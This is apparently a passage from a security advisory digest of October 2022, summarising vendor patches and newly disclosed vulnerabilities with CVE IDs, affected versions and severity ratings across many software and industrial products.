(Medium), CVE-2020-16238 (Medium), CVE-2020-25168 (Low), CVE-2020-25156 (High),
CVE-2020-25160 (Medium)
Google has released Beta channel 107.0.5304.51 (Platform version: 15117.66.0 / 15117.67.0)
for most ChromeOS devices, Chrome Beta 107 (107.0.5304.54) for Android, and Beta channel has
been updated to 107.0.5304.62 for Windows, Mac & Linux.
HP has released to security updates to resolve a vulnerability in the system BIOS for HP PC
products, which can allow loss of integrity.
CVE ID: CVE-2022-31643 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A command injection vulnerability has been discovered in D-Link DIR878 via the component
/bin/proc.cgi.The affected version is D-Link DIR878 1.30B08 Hotfix_04.
CVE ID: CVE-2022-43184 (Critical)
A stack overflow vulnerability has been discovered in Acer Altos that allows to cause a
Denial of Service (DoS) via injecting crafted shellcode into the NVRAM variable. The
affected version is Acer Altos W2000h-W570h F4 R01.03.0018.
CVE ID: CVE-2022-41415 (Critical)
A deserialization vulnerability has been discovered in dubbo hessian-lite which can lead to
malicious code execution. The affected versions are dubbo hessian-lite 3.2.12 and below.
CVE ID: CVE-2022-39198 (Critical)
An improper input validation vulnerability has been discovered in the J-Web component of
Juniper Networks Junos OS that allows to access data without proper authorisation. The
affected versions are Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2
versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to
19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5;
20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to
21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4
versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
CVE ID: CVE-2022-22241 (Critical)
A Server Side Request Forgery (SSRF) vulnerability has been discovered in kkFileView via
controller\OnlinePreviewController.java. The affected version is kkFileView 4.0.
CVE ID: CVE-2022-42149 (Critical)
A vulnerability has been discovered in GPON ONT Titanium that allows to escalate privileges
via a brute force attack at the login page. The affected version is GPON ONT Titanium 2122A
T2122-V1.26EXL.
CVE ID: CVE-2022-40055 (Critical)
B. Braun Melsungen AG has released security updates to address multiple vulnerabilities in
B. Braun Melsungen AG's Equipment- Infusomat Space Large Volume Pump.
CVE ID: CVE-2021-33886 (Medium), CVE-2021-33885 (Critical), CVE-2021-33882 (Medium),
CVE-2021-33883 (Medium), CVE-2021-33884 (Medium)
Remote code execution vulnerability due to insufficient user privilege verification has been
discovered in reverseWall-MDS. Remote attackers can exploit the vulnerability such as
stealing account, through remote code execution.
CVE ID: CVE-2022-23769 (Critical)
Path traversal vulnerability has been discovered in Tableau Server Administration Agent’s
internal file transfer service that allow remote code execution.
CVE ID: CVE-2022-22128 (Critical)
A double-free vulnerability has been discovered in contrib/shpsort.c of shapelib that allow
an attacker to cause a denial of service or have other unspecified impact via control over
malloc. The affected versions are shapelib 1.5.0 and older releases.
CVE ID: CVE-2022-0699 (Critical)
A SQL Injection vulnerability has been discovered in Merchandise Online Store that allows an
attacker to log in to the admin account. The affected version is Merchandise Online Store
v.1.0.
CVE ID: CVE-2022-42237 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20933 (High), CVE-2022-20822 (High), CVE-2022-20917 (Medium),
CVE-2022-20959 (Medium), CVE-2022-20776 (Medium), CVE-2022-20811 (Medium), CVE-2022-20953
(Medium), CVE-2022-20954 (Medium), CVE-2022-20955 (Medium)
Google has released Chrome Dev 108 (108.0.5359.10) for Android, Dev channel 108.0.5359.10
for Windows, Mac and Linux, and Stable channel 106.0.5249.134 (Platform version:
15054.114.0/15054.115.0) for most ChromeOS devices.
VMware has released a security update to address a vulnerability in Reactor Netty HTTP
Server. The affected versions are Reactor Netty 1.0.11 to 1.0.23.
CVE ID: CVE-2022-31684 (Low)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Oracle has released its critical patch updates for October 2022 to address 370
vulnerabilities across multiple products. An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2022-23305 (Critical), CVE-2022-21587 (Critical), CVE-2022-39428
(Critical), CVE-2022-25315 (Critical), CVE-2022-32532 (Critical), CVE-2022-23457 (Critical),
CVE-2022-23943 (Critical), CVE-2022-33980 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in GetSimple CMS. The
affected version is GetSimple CMS v3.3.16.
CVE ID: CVE-2022-41544 (Critical)
An insufficient validation vulnerability has been discovered in RAVA certificate validation
system. An unauthenticated remote attacker can inject arbitrary SQL command to access,
modify and delete database.
CVE ID: CVE-2022-39056 (Critical)
An out-of-bounds write vulnerability has been discovered in the MPTCP module. Successful
exploitation of this vulnerability can cause root privilege escalation attacks implemented
by modifying program information.
CVE ID: CVE-2022-41578 (Critical)
It has been discovered that the HIPP module has a vulnerability of bypassing the check of
the data transferred in the kernel space. Successful exploitation of this vulnerability can
cause out-of-bounds access to the HIPP module and page table tampering, affecting device
confidentiality and availability.
CVE ID: CVE-2022-38986 (Critical)
An Use-After-Free (UAF) vulnerability has been discovered in BT Hfp Client module.
Successful exploitation of this vulnerability can result in arbitrary code execution.
CVE ID: CVE-2022-38983 (Critical)
A prototype pollution vulnerability has been discovered in the function copy in dom.js in
the xmldom package for Node.js. The affected versions are dom.js in xmldom package before
0.8.3.
CVE ID: CVE-2022-37616 (Critical)
Advantech has released security updates to address path traversal, and stack-based buffer
overflow vulnerabilities in Advantech's equipment- R-SeeNet. Successful exploitation of
these vulnerabilities can result in an unauthorized attacker remotely deleting files on the
system or allowing remote code execution.i8
CVE ID: CVE-2022-3387 (Medium), CVE-2022-3386 (Critical), CVE-2022-3385
(Critical)
Debian has released security updates to resolve several vulnerabilities in node-xmldom, and
bcel. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-37616 (Critical), CVE-2022-34169 (High)
Yokogawa has released security updates to address a stack-based buffer overflow
vulnerability in Yokogawa application software WTViewerE. The affected products are
WTViewerE 761941 versions 1.31 to 1.61, and WTViewerEfree versions 1.01 to 1.52.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.4 and Firefox 106. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-42927 (High), CVE-2022-42928 (High), CVE-2022-42929 (Medium),
CVE-2022-42930 (Medium), CVE-2022-42931 (Low), CVE-2022-42932 (Medium)
Adobe has released security updates to address improper input validation, and out-of-bounds
read vulnerabilities in Adobe Illustrator. The affected products are Illustrator 2022
26.4?and?earlier, and Illustrator 2021 25.4.7?and?earlier.
CVE ID: CVE-2022-38435 (High), CVE-2022-38436 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Juniper Networks has released security updates to address an improper handling of an
unexpected data type vulnerability in Junos OS and Junos OS Evolved. The affected products
are Junos OS 21.3, 21.4, 22.1, 22.2, and Junos OS Evolved 21.3-EVO, 21.4-EVO, 22.1-EVO,
22.2-EVO.
CVE ID: CVE-2022-22219 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
An unrestricted file upload vulnerability has been discovered in Gin-Vue-Admin. The affected
versions are Gin-Vue-Admin v2.5.1 through v2.5.3b.
CVE ID: CVE-2022-32176 (Critical)
Debian has released a security update to address an integer overflow vulnerability in
libksba package, which can result in Denial of Service (DoS) or the execution of arbitrary
code.
CVE ID: CVE-2022-3515
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that multiple Trumpf products use default privileged Windows users
and passwords. An adversary could use these accounts to remotely gain full access to the
system.
CVE ID: CVE-2022-2052 (Critical)
Ree6 has released a security update to address a sql injection vulnerability in Ree6. The
affected versions are Ree6 prior to 1.7.0.
CVE ID: CVE-2022-39303 (Critical)
Apache has released a security update to address a vulnerability in Apache Commons Text when
it performs variable interpolation. The affected versions are Apache Commons Text 1.5
through 1.9.
CVE ID: CVE-2022-42889 (Critical)
A code injection vulnerability has been discovered in Spring Cloud Gateway. The affected
versions are Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+.
CVE ID: CVE-2022-22947 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel
(Azure), and zlib. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-37434, CVE-2022-33741 (High), CVE-2022-32296 (Low), CVE-2022-1012
(Critical), CVE-2022-33740 (High), CVE-2022-33744 (Medium), CVE-2022-33742 (High),
CVE-2022-0812 (Medium), CVE-2022-2318 (Medium), CVE-2022-26365 (High)
A SQL injection vulnerability has been discovered in Django. The affected versions are
Django 3.2 before 3.2.14, and Django 4.0 before 4.0.6.
CVE ID: CVE-2022-34265 (Critical)
An improper limitation of a pathname to a Restricted Directory ('Path Traversal')
vulnerability has been discovered in Adobe ColdFusion. The affected versions are Adobe
ColdFusion Update 14 and earlier, and Adobe ColdFusion Update 4 and earlier.
CVE ID: CVE-2022-38418 (Critical)
A SQL injection vulnerability has been discovered in Online
Diagnostic Lab Management system. The affected version is Online Diagnostic Lab Management
System version 1.0.
CVE ID: CVE-2022-42064 (Critical)
A double free vulnerability has been discovered in the storage module. Successful
exploitation of this vulnerability will cause the memory to be freed twice.
CVE ID: CVE-2022-39002 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that an unauthenticated attacker can cause a Denial of Service (DoS)
vulnerabilities in Ivanti products. The affected products are Ivanti Connect Secure (ICS)
versions prior to 9.1R14.3, 9.1R15.2, 9.1R16.2, and 22.2R4, Ivanti Policy Secure (IPS)
versions prior to 9.1R17 and 22.3R1, and Ivanti Neurons for Zero-Trust Gateway versions
prior to 22.3R1.
CVE ID: CVE-2022-35254 (High), CVE-2022-35258 (High)
Dell has released security updates to address OS command injection, privilege context
switching error, and allocation of resources without limits or throttling vulnerabilities in
Dell EMC PowerScale OneFS. The affected versions are Dell PowerScale OneFS 8.2.2 to 9.3.0,
8.2.x to 9.4.0.x, and 8.2.0.x to 9.4.0.x.
CVE ID: CVE-2022-34437 (Medium), CVE-2022-34438 (Medium), CVE-2022-34439
(Medium)
Sonic Wall has released security updates to address a file path manipulation vulnerability
in SonicWall GMS. The affected versions are SonicWall GMS prior to 9.3.2.
CVE ID: CVE-2021-20030 (Medium)
An unauthenticated command injection vulnerability has been discovered in ArrayOS AG of
Array Networks AG/vxAG. The affected versions are ArrayOS AG prior to 9.4.0.469.
CVE ID: CVE-2022-42897 (Critical)
MelisFront has released security update to address a deserialization of arbitrary data
vulnerability in melisplatform/melis-front. The affected versions are
melisplatform/melis-front prior to 5.0.1.
CVE ID: CVE-2022-39298 (Critical)
MelisCms has released security update to address a deserialization of arbitrary data
vulnerability in melisplatform/melis-cms. The affected versions are melisplatform/melis-cms
prior to 5.0.1.
CVE ID: CVE-2022-39297 (Critical)
A prototype pollution vulnerability has been discovered in parseQuery function of
parseQuery.js for webpack loader-utils. The affected version is webpack loader-utils 2.0.0.
CVE ID: CVE-2022-37601 (Critical)
An authentication bypass vulnerability has been discovered in Apache Shiro when forwarding
or including via RequestDispatcher. The affected versions are Apache Shiro before 1.10.0.
CVE ID: CVE-2022-40664 (Critical)
A command injection vulnerability has been discovered in git package. The affected versions
are git package before 1.11.0.
CVE ID: CVE-2022-25648 (Critical)
Mitsubishi Electric has released security updates to address multiple vulnerabilities in its
Equipment- MELSEC iQ-R Series.
CVE ID: CVE-2021-20599 (Critical), CVE-2021-20597 (High), CVE-2021-20594
(Medium)
Palo Alto Networks has released security update to address an authentication bypass
vulnerability in the Palo Alto Networks PAN-OS 8.1 web interface.
CVE ID: CVE-2022-0030
Drupal has released security update to resolve an access bypass vulnerability in Twig Field
Value, a third-party libraries used by Drupal that doesn't sufficiently apply access
restrictions when using the filters field_label, field_value, field_raw and
field_target_entity. The affected versions are Twig Field Value module 8.x-1.x and 2.0.x.
Juniper Networks has released security updates to address multiple vulnerabilities affecting
its products. An attacker can exploit some of these vulnerabilities to take control of an
affected system.
A memory corruption vulnerability has been discovered in SAP SQL Anywhere, and SAP IQ. The
affected versions are SAP SQL Anywhere 17.0, and SAP IQ 16.1.
CVE ID: CVE-2022-35299 (Critical)
vm2 has released a security update to address a vulnerability that allows a threat actor to
bypass sandbox protections to gain Remote Code Execution (RCE) rights on the host running
the sandbox. The affected versions are vm2 prior to 3.9.11.
CVE ID: CVE-2022-36067 (Critical)
A weak key protection vulnerability has been discovered in Siemens SIMATIC S7-1200, S7-1500
CPU Families. Successful exploitation can allow native code execution to extract heavily
guarded, hardcoded, global private cryptographic keys embedded within the Siemens SIMATIC
S7-1200/1500 PLC and TIA Portal product lines.
CVE ID: CVE-2022-38465 (Critical)
Multiple vulnerabilities have been discovered in Zoom Client for Meetings for macOS, and
Zoom On-Prem Deployments. The affected versions are Zoom Client for Meetings for macOS
(Standard and for IT Admin) 5.10.6 and prior to 5.12.0, and Zoom On-Premise Meeting
Connector MMR before version 4.8.20220916.131.
CVE ID: CVE-2022-28762 (High), CVE-2022-28761 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Lenovo released security updates to address IPV6 VLAN stacking vulnerabilities in its
Network security controls that can be exploited by sending crafted network packets to bypass
their inspection and filtering capabilities. The affected product is Broadcom - BES 53248
Networking Switch.
CVE ID: CVE-2021-27853 (Medium), CVE-2021-27854 (Medium), CVE-2021-27861 (Medium),
CVE-2021-27862 (Medium)
LibreOffice has released security updates to address a macro URL arbitrary script execution
vulnerability in its products. The affected versions are LibreOffice 7.3.6 to 7.4.1.
CVE ID: CVE-2022-3140
Trellix has released security update to address multiple vulnerabilities in ePolicy
Orchestrator. The affected versions are ePolicy Orchestrator (ePO) 5.10 prior to update 14.
CVE ID: CVE-2022-3338 (Medium), CVE-2022-3339 (Medium)
Sensormatic Electronics has released security updates to address a vulnerability in its
C-CURE 9000 equipment. The affected versions are C-CURE 9000 2.90 and earlier.
CVE ID: CVE-2021-36201 (Medium)
Multiple vulnerabilities have been discovered in Altair's Equipment- HyperView Player.
Successful exploitation of these vulnerabilities can crash the device accessed. The affected
products are HyperView Player versions 2021.1.0.27 and prior.
CVE ID: CVE-2022-2947 (High), CVE-2022-2949 (High), CVE-2022-2950 (High),
CVE-2022-2951 (High)
Microsoft has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address a vulnerability in .NET 6 that can cause
execution of arbitrary code. The affected product is Ubuntu 22.04 LTS.
CVE ID: CVE-2022-41032 (High)
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor 8.2 LTSR CU1. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-33748, CVE-2022-33749
VMware has released a security update to address an arbitrary file read vulnerability in
Aria Operations. A malicious actor with administrative privileges can read arbitrary files
containing sensitive data.
CVE ID: CVE-2022-31682 (Medium)
Debian has released security updates to resolve several vulnerabilities in Twig, and
isc-dhcp. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39261 (High), CVE-2022-2928 (Medium), CVE-2022-2929
(Medium)
Schneider Electric has released security updates to resolve multiple
vulnerabilities in its products. An attacker can exploit these vulnerabilities to take
control of an affected system.
SAP has released security updates to address several vulnerabilities
affecting multiple products. An attacker can exploit these vulnerabilities to take control
of an affected system.
Phoenix Contact has released security updates to address multiple
vulnerabilities in PLCnext Firmware. Availability, integrity, or confidentiality of the
PLCnext Control can be compromised by attacks using these vulnerabilities.
CVE ID: CVE-2022-32207 (Critical), CVE-2022-2207 (Critical), CVE-2022-1927
(Critical), CVE-2022-0547 (Critical), CVE-2022-25235 (Critical), CVE-2022-25236 (Critical),
CVE-2022-2210 (Critical)
Microsoft has released security updates to address an elevation of privilege vulnerability
in several versions of Azure Arc-enabled Kubernetes cluster that can allow an
unauthenticated user to elevate their privileges and potentially gain administrative control
over the Kubernetes cluster.
CVE ID: CVE-2022-37968 (Critical)
A stored Cross-Site Scripting (XSS) has been discovered in Gogs that could lead to an
account takeover. The affected versions are Gogs v0.6.5 through v0.12.10.
CVE ID: CVE-2022-32174 (Critical)
It has been discovered that an integer conversion error vulnerability in Hermes bytecode
generation, prior to commit 6aa825e480d48127b480b08d13adf70033237097, can be used to perform
out of bounds operations and subsequently execute arbitrary code.
CVE ID: CVE-2022-40138 (Critical)
An integer overflow vulnerability has been discovered in Hermes, prior to commit
5b6255ae049fa4641791e47fad994e8e8c4da374 that allows execute arbitrary code via crafted
JavaScript.
CVE ID: CVE-2022-35289 (Critical)
A forced browsing vulnerability has been discovered in Trend Micro Apex One that allow an
access to the Apex One console on affected installations to escalate privileges and modify
certain agent groupings.
CVE ID: CVE-2022-41746 (Critical)
Aruba has released security updates to address an unauthenticated buffer overflow
vulnerability in Aruba InstantOS and ArubaOS 10 web management interface. The affected
versions are Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x:
6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x:
8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and
below.
CVE ID: CVE-2022-37891 (Critical)
Aruba has released security updates to address an unauthenticated buffer overflow
vulnerability in Aruba InstantOS and ArubaOS 10 web management interface. The affected
versions are Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x:
6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x:
8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and
below.
CVE ID: CVE-2022-37890 (Critical)
Aruba has released security updates to address buffer overflow vulnerability in Aruba PAPI
protocol (Aruba Networks AP management protocol). The affected versions are Aruba InstantOS
6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba
InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba
InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below.
CVE ID: CVE-2022-37889 (Critical)
A command injection vulnerability has been discovered in TOTOLINK NR1800X. The affected
version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41525 (Critical)
An unauthenticated stack overflow vulnerability via the "main" function has been discovered
in TOTOLINK NR1800X. The affected version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41522 (Critical)
A command injection vulnerability via the UploadFirmwareFile function has been discovered in
TOTOLINK NR1800X. The affected version is TOTOLINK NR1800X V9.1.0u.6279_B20210910.
CVE ID: CVE-2022-41518 (Critical)
Daikin Holdings Singapore Pte Ltd. has released security updates to address use of
hard-coded password, and improper access control vulnerabilities in its equipment- SVMPC1,
SVMPC2. Successful exploitation of these vulnerabilities can disclose sensitive information
to the affected devices and can give an attacker full control of the system. The affected
products are SVMPC1: Version 2.1.22 and prior, and SVMPC2: Version 1.2.3 and prior.
CVE ID: CVE-2022-41653 (Critical), CVE-2022-38355 (High)
Adobe has released security updates to address multiple critical vulnerabilities in Adobe
ColdFusion, Adobe Acrobat Reader, Adobe Commerce, and Adobe Dimension. An attacker can
exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-35710 (Critical), CVE-2022-35711 (Critical),
CVE-2022-35690 (Critical), CVE-2022-35712 (Critical), CVE-2022-35698 (Critical)
Fortinet has released security updates to address an authentication bypass vulnerability in
administrative interface for FortiOS, FortiProxy and FortiSwitchManager which can allow to
perform operations on the administrative interface via specially crafted HTTP or HTTPS
requests.
CVE ID: CVE-2022-40684 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address a bruteforce vulnerability in Dell EMC XtremIO
which can be exploited to gain access to an admin account . The affected versions are Dell
EMC XtremIO versions prior to X2 6.4.0-22.
CVE ID: CVE-2022-31228 (High)
Apple has released security updates to resolve multiple vulnerabilities in iOS 16.0.3, and
watchOS 9.0.2. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-22658
A SQL injection vulnerability has been discovered in Sourcecodester Simple E-Learning
System. The affected version is Sourcecodester Simple E-Learning System 1.0.
CVE ID: CVE-2022-40872 (Critical)
A SQL injection vulnerability has been discovered in B.C. Institute of Technology
CodeIgniter. The affected versions are B.C. Institute of Technology CodeIgniter 3.1.13 and
below.
CVE ID: CVE-2022-40835 (Critical)
Trend Micro has released a security update to address Information disclosure, and privilege
escalation vulnerabilities in Trend Micro Deep Security and Cloud One - Workload Security
agents for Windows. The affected products are Deep Security Agent Version 20, and Cloud One
- Workload Security Agent Version 20.
GROWI has released a security update to address an improper access control vulnerability in
its products. The affected products are GROWI versions prior to v5.1.4 (v5 series), and
GROWI versions prior to v4.5.25 (v4 series).
CVE ID: CVE-2022-41799 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
VMware has released security updates to address unsafe deserialisation, and null-pointer
dereference vulnerabilities in VMware vCenter Server and VMware ESXi respectively.
CVE ID: CVE-2022-31680 (High), CVE-2022-31681 (Low)
It has been discovered that cyber actors continue to target government and critical
infrastructure networks with an increasing array of new and adaptive techniques—some of
which pose a significant risk to Information Technology (IT) Sector organisations (including
telecommunications providers), Defense Industrial Base (DIB) Sector organisations, and other
critical infrastructure organisations.
Rockwell Automation has released security updates to address improper access control, and
SQL injection vulnerabilities in FactoryTalk VantagePoint software, which can allow Remote
Code Execution (RCE). The affected versions are FactoryTalk VantagePoint Firmware 8.0 to
8.31.
CVE ID: CVE-2022-38743 (Critical), CVE-2022-3158 (Critical)
An improper access control vulnerability has been discovered in HIWIN's Equipment- HIWIN
Robot System Software (HRSS) that can cause a Denial of Service (DoS) condition.
CVE ID: CVE-2022-3382 (High)
Ubuntu has released security updates to address several vulnerabilities in LibreOffice and
Linux kernel. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-26307 (High), CVE-2022-26306 (High), CVE-2022-26305 (High),
CVE-2022-36946 (High), CVE-2022-2503 (Medium), CVE-2022-32296 (Low), CVE-2021-33655
(Medium), CVE-2022-1012 (High), CVE-2022-1729 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An authentication bypass vulnerability has been discovered in WNAP210v2 wireless access
point. NETGEAR will not release a fix for this vulnerability on the affected product as it
is outside of the security support period.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-2928 (Medium), CVE-2022-2929 (Medium), CVE-2022-42010,
CVE-2022-42011, CVE-2022-42012, CVE-2022-40617 (Medium)
An out-of-bounds read vulnerability has been discovered in the PCRE2 library that affects
the recursions in JIT-compiled regular expressions caused by duplicate data transfers.
CVE ID: CVE-2022-1587 (Critical)
NVIDIA has released a security update for NVIDIA CUDA Toolkit software to address a
stack-based buffer overflow vulnerability that can lead to code execution, denial of
service, or information disclosure. The affected versions are NVIDIA CUDA Toolkit all
versions prior to 11.8 for Linux and Windows.
CVE ID: CVE-2022-34667 (Medium)
Omron has released security updates to address multiple out-of-bounds write vulnerabilities
in its equipment- CX-Programmer that can crash the device or allow arbitrary code execution.
CVE ID: CVE-2022-3398 (High), CVE-2022-3396 (High), CVE-2022-3397 (High)
Horner Automation has released security updates to address out-of-bounds write, and access
of uninitialized pointer vulnerabilities in its equipment- Cscape which can cause arbitrary
code execution.
CVE ID: CVE-2022-3379 (High), CVE-2022-3378 (High), CVE-2022-3377 (High)
Multiple vulnerabilities such as Cross-Site Request Forgery (CSRF), and HTTP response
splitting have been discovered in Hitachi Energy's Equipment- Modular Switchgear Monitoring
(MSM). Successful exploitation of these vulnerabilities can allow to perform malicious
command injection, trick a valid user into downloading malicious software onto their
computer.
CVE ID: CVE-2021-40335 (Medium), CVE-2021-40336 (Medium)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20929 (High), CVE-2022-20814 (High), CVE-2022-20853 (High),
CVE-2021-27853 (Medium), CVE-2021-27854 (Medium), CVE-2021-27861 (Medium), CVE-2021-27862
(Medium)
A vulnerability has been discovered in Autodesk Desktop App (ADA) that can cause escalate
privileges and execute arbitrary code.
CVE ID: CVE-2022-33882 (Critical)
A SQL Injection vulnerability has been discovered in Veritas NetBackup and related Veritas
products. The affected versions are Veritas NetBackup through 10.0.
CVE ID: CVE-2022-42302 (Critical)
Johnson Controls has released a security update to address a vulnerability in Metasys ADX
when using the MVE SMP UI, which allows an Active Directory user to execute validated
actions without providing a valid password. The affected version is Metasys ADX Server
version 12.0 running MVE.
CVE ID: CVE-2022-21936 (High)
An use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's equipment- Totalys MultiProcessor that can allow access, modify, or delete
sensitive information, including electronic protected health information (ePHI), protected
health information (PHI), and personally identifiable information (PII). The affected
versions are BD Totalys MultiProcessor 1.70 and earlier.
CVE ID: CVE-2022-40263 (Medium)
Data Exchange Layer (DXL) Broker has released security updates to address multiple
vulnerabilities in Java, OpenSSL, Log4J, and RSA BSAFE Crypto. The affected versions are DXL
Broker 6.0.0, and 5.x.
CVE ID: CVE-2019-3738 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2019-13351(High), CVE-2022-33741(High), CVE-2022-33744 (Medium),
CVE-2021-33655(Medium), CVE-2022-33740(High), CVE-2022-34495(Medium), CVE-2022-26365(High),
CVE-2022-36946(High), CVE-2022-33743(High), CVE-2022-33742(High), CVE-2022-34494(Medium),
CVE-2022-2318(Medium), CVE-2022-1012(High), CVE-2022-32296(Low), CVE-2022-1729(High),
CVE-2022-2503(Medium),CVE-2022-41323, CVE-2022-40617, CVE-2021-3782 (Critical)
Dell has released security updates to address multiple vulnerabilities in Dell EMC Avamar,
Dell EMC NetWorker Virtual Edition (NVE) and Dell EMC PowerProtect DP Series Appliance /
Dell EMC Integrated Data Protection Appliance (IDPA).
SUSE has released a security update to resolve multiple vulnerabilities in the slurm
package.
CVE ID: CVE-2022-29500 (High), CVE-2022-29501 (High), CVE-2022-31251
(High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Microsoft has released Microsoft Edge Stable Channel (Version 106.0.1370.34) to resolve a
Spoofing vulnerability in Microsoft Edge (Chromium-based).
CVE ID: CVE-2022-41035 (High)
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-10-05 or later, address all of these
issues.
It has been discovered that in Amazon AWS Redshift JDBC Driver the Object Factory does not
check the class type when instantiating an object from a class name. The affected versions
are Amazon AWS Redshift JDBC Driver before 2.1.0.8.
CVE ID: CVE-2022-41828 (Critical)
A SQL Injection vulnerability has been discovered in BigProf Online Invoicing System. The
affected versions are BigProf Online Invoicing System before 2.9.
CVE ID: CVE-2020-35674 (Critical)
Microsoft has discovered Server-Side Request Forgery (SSRF), and Remote Code Execution (RCE)
zero-day vulnerabilities in Microsoft Exchange Server. The mitigations are available.
CVE ID: CVE-2022-41040, CVE-2022-41082
Debian has released a security update to address multiple vulnerabilities in Chromium
package, which can result in the execution of arbitrary code, Denial of Service (DoS) or
information disclosure.
CVE ID: CVE-2022-3370, CVE-2022-3373 (Medium)
An improper input validation vulnerability has been discovered in Dell iDRAC8 & Dell
iDRAC9's Racadm when the firmware lock-down configuration is set. Security updates are
available. The affected products are Dell iDRAC9 version 6.00.02.00 and prior and Dell
iDRAC8 version 2.83.83.83 and prior.
CVE ID: CVE-2022-34435, CVE-2022-34436
An authorization bypass vulnerability has been discovered in b2evolution. The affected
versions are b2evolution 7.2.3 and below.
CVE ID: CVE-2022-30935 (Critical)
It has been discovered that WAPPLES has a hardcoded system account that can be exploited to
access the system configuration and confidential information (such as SSL keys) via an HTTPS
request to the /webapi/ URI on port 443 or 5001. The affected versions are WAPPLES through
6.0.
CVE ID: CVE-2022-35413 (Critical)
An arbitrary code execution vulnerability has been discovered in Coreboot. The affected
versions are Coreboot 4.13 through 4.16.
